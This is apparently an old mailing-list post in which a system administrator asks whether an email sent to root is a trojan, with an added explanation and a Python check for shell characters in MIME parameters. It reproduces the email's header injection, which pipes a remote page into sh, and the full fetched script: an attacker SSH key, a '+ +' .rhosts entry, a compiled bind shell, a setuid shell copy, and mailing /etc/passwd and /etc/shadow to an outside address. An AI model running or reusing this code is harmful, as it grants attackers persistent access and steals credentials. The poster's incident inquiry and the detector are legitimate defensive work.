
Is it a Trojan Horse?



Hello,

    I received an email addressed to root with strange contents. The
whole email is shown below for your reference.
    When I read the logs attached to the mail, I don't find anything
(IP address, DNS) relating to our domain.

    Then I tried to find out where the email was from, so I pointed my
browser to http://tofan.onza.net. The browser outputs a page of shell
scripts and program code! They are also attached at the end of this
mail. Then I started to scan the whole email carefully, and found a
strange Content-Type statement as follows:

    Content-Type: TEXT/PLAIN;
charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
name="emailf" Content-Transfer-Encoding: BASE64

    Looks like it starts Lynx to browse the page with the suspicious
code, then runs the code to steal the /etc/passwd file!

    Seems like my Pine didn't run Lynx automatically... but I am not
sure of the harm to us yet!

    Did you ever receive an email like this? Any comments?

regards,
Tang.

UMac, INESC Macau
R.A.
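The header quoted above is a shell-metacharacter injection into a MIME parameter: the backticked `lynx ... | sh` command, with `${IFS}` standing in for spaces, would run on any mail agent that hands the charset or name value to a shell. As an added defender's check (not part of the original post), this Python snippet walks every MIME part of a message and flags Content-Type parameters that contain such characters; the two sample headers are constructed here from the one quoted above and from the benign first part of the mail.

```python
import email
import re
from email import policy

# Characters that never belong in a MIME parameter value but would be
# interpreted if the value were ever passed to a shell: backticks,
# $( and ${ substitutions (the quoted header uses ${IFS} for spaces),
# pipes, separators and redirections.
SUSPICIOUS = re.compile(r'`|\$\(|\$\{|[|;&<>]')

# Constructed samples: minimal messages carrying the quoted headers.
MALICIOUS_HEADER = (
    'Content-Type: TEXT/PLAIN;\n'
    ' charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"\n'
    '\n'
    'body\n'
)
BENIGN_HEADER = (
    'Content-Type: TEXT/PLAIN; charset=US-ASCII; name="log.txt"\n'
    '\n'
    'body\n'
)


def suspicious_params(raw):
    """Return {parameter: value} for every Content-Type parameter in any
    MIME part of the message whose value contains shell metacharacters.
    An empty dict means nothing was flagged."""
    msg = email.message_from_string(raw, policy=policy.compat32)
    hits = {}
    for part in msg.walk():
        # get_params() also yields the media type itself with an empty
        # value; the regex simply never matches that entry.
        for name, value in part.get_params(failobj=[]):
            if SUSPICIOUS.search(value):
                hits[name.lower()] = value
    return hits


if __name__ == "__main__":
    print(suspicious_params(MALICIOUS_HEADER))  # flags the charset value
    print(suspicious_params(BENIGN_HEADER))     # {}
```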


============================== Beginning of email =============================
>From root@tofan.onza.net  Mon May 15 15:18:55 2000
Received: from mars.fontijne.nl (smtp.fontijne.nl [195.7.212.130])
 by inesc-macau.org.mo (8.9.2/8.9.2/Debian/GNU) with ESMTP id PAA16075
 for <root@neptune.inesc-macau.org.mo>; Mon, 15 May 2000 15:16:41 +0800
(CST)
Received: from Bastion.Fontijne.nl (195.7.212.131 [195.7.212.131]) by
mars.fontijne.nl with SMTP (Microsoft Exchange Internet Mail Service
Version 5.5.2650.21)
 id K69W8LSQ; Mon, 15 May 2000 08:55:41 +0200
Received: from atl-qbu-zpn-vty3.as.wcom.net ([216.192.215.3]) by
Bastion.Fontijne.nl; Mon, 15 May 2000 08:48:49 +0000 (GMT)
Message-ID: <Pine.LNX.4.10.9909171428170.28464-100000@tofan.onza.net>
Date: Sat, 13 May 2000 21:15:05 -0400 (EDT)
From: root <root@tofan.onza.net>
Subject: DOS attack, log file attached!
MIME-Version: 1.0
To: root@tofan.onza.net
Content-Type: MULTIPART/MIXED;
BOUNDARY="-1463811839-1047689522-958180505=:1450"
Status: RO
X-Status:

  This message is in MIME format.  The first part should be readable
text,
  while the remaining parts are likely unreadable without MIME-aware
tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

---1463811839-1047689522-958180505=:1450
Content-Type: TEXT/PLAIN; charset=US-ASCII

THIS IS TO INFORM YOU THAT A DOS ATTACK WAS LOGGED ON A
SECURITIES AND EXCHANGE COMMISION INTERNET FIREWALL
FROM YOUR DOMAIN.
AN EXCERPT FROM OUR LOGS IS ATTACHED BELOW.
ALL TIMES ARE US EASTERN AND ARE SYNCED WITH NTP.

Jerry Leininser
cops@tofan.onza.net

---2463811839-1047689522-958180505=:1450
Content-Type: APPLICATION/octet-stream;
name="log.txt.tofan.onza.net.exit"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.1000512211505.1450B@tofan.onza.net>
Content-Description:

---2463811839-1047689522-958180505=:1450--
---1463811839-1047689522-958180505=:1450
Content-Type: TEXT/PLAIN;
charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
name="emailf" Content-Transfer-Encoding: BASE64
Content-Description: THE LOGS
Content-Disposition: attachment; filename="emailf"








PLEASE FORGIVE US IF YOUR SYSTEM WAS ERRORNEOUSLY ACUSED,
WE HAVE FACED A KERNEL PANIC!

Sep 16 17:29:21 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=63749 F=0x0040 T=55
.S....
Sep 16 17:29:24 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=63928 F=0x0040 T=55
.S....
Sep 16 17:29:30 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=64281 F=0x0040 T=55
.S....
Sep 16 17:29:42 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=64978 F=0x0040 T=55
.S....
Sep 16 17:29:45 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1389 \
              206.121.213.44:8080 L=60 S=0x00 I=65097 F=0x0040 T=55
.S....
Sep 16 17:29:48 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1389 \
              206.121.213.44:8080 L=60 S=0x00 I=65205 F=0x0040 T=55
.S....
Sep 16 17:29:54 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1389 \
              206.121.213.44:8080 L=60 S=0x00 I=22 F=0x0040 T=55 .S....
Sep 16 17:30:05 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1412 \
              206.121.213.44:8080 L=60 S=0x00 I=775 F=0x0040 T=55 .S....

Sep 16 17:30:06 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=787 F=0x0040 T=55 .S....

Sep 16 17:30:11 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1412 \
              206.121.213.44:8080 L=60 S=0x00 I=1014 F=0x0040 T=55
.S....
Sep 16 17:30:21 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1423 \
              206.121.213.44:8080 L=60 S=0x00 I=1438 F=0x0040 T=55
.S....


---1463811839-1047689522-958180505=:1450--

================================ End of email ==============================




============================== Source of web page ==============================
grep "x4334@AGRI" ~/.ssh/authorized_keys >/dev/null 2>&1 || if [ 0 ];
then
if [ ! -d ~/.ssh ]
then umask 022 >/dev/null 2>&1;mkdir ~/.ssh >/dev/null 2>&1
echo "+ +" >> ~/.rhosts 2>/dev/null
fi
umask 022 >/dev/null 2>&1
echo "512 35
9785877609308338986917478061014184970982460312434529051173539551539508793288925026879592531038110506684705572154197270221242712482140435531967239855453591
x4334@AGRI" >> ~/.ssh/authorized_keys 2>/dev/null
cat << __EOF__ > /tmp/io.c
#define PORT 56789
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;

int main (int argc, char **argv)
{

    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (soc_des == -1)
        exit(-1);
    bzero((char *) &serv_addr, sizeof(serv_addr));
strcpy(argv[0],"updated");
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    serv_addr.sin_port = htons(PORT);
    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr,
sizeof(serv_addr));
    if (soc_rc != 0)
        exit(-1);
    if (fork() != 0)
        exit(0);
    setpgrp();
    signal(SIGHUP, SIG_IGN);
    if (fork() != 0)
        exit(0);
    soc_rc = listen(soc_des, 5);
    if (soc_rc != 0)
        exit(0);
    while (1) {
        soc_len = sizeof(client_addr);
        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr,
&soc_len);
        if (soc_cli < 0)
            exit(0);
        cli_pid = getpid();
        server_pid = fork();
        if (server_pid != 0) {
            dup2(soc_cli,0);
            dup2(soc_cli,1);
            dup2(soc_cli,2);
            execl("/bin/sh","sh", "-i",(char *)0);
            close(soc_cli);
            exit(0);
        }
    close(soc_cli);
    }
}
__EOF__
gcc -o /tmp/io /tmp/io.c >/dev/null 2>&1
/tmp/io >/dev/null 2>&1 ||mkdir /tmp/.pkoss493 >/dev/null 2>&1&&cp
/bin/sh /tmp/.pkoss493/.rc >/dev/null 2>&1;chmod 4715 /tmp/.pkoss493/.rc
>/dev/null 2>&1
rm -rf /tmp/io.c
rm -rf /tmp/io
mail -s hhp000 bjern3@attglobal.net >/dev/null 2>&1 < /etc/passwd
echo "`hostname -i  2>&1` - `id  2>&1`- `uname -a  2>&1`- `ls -al ~
2>&1` - `cat /etc/shadow 2>&1`" | mail -s hhp001 bjern3@attglobal.net
2>/dev/null
chmod og-w ~ >/dev/null 2>&1
chmod og-w ~/.ssh >/dev/null 2>&1
fi
============================== End of source of web page ==========================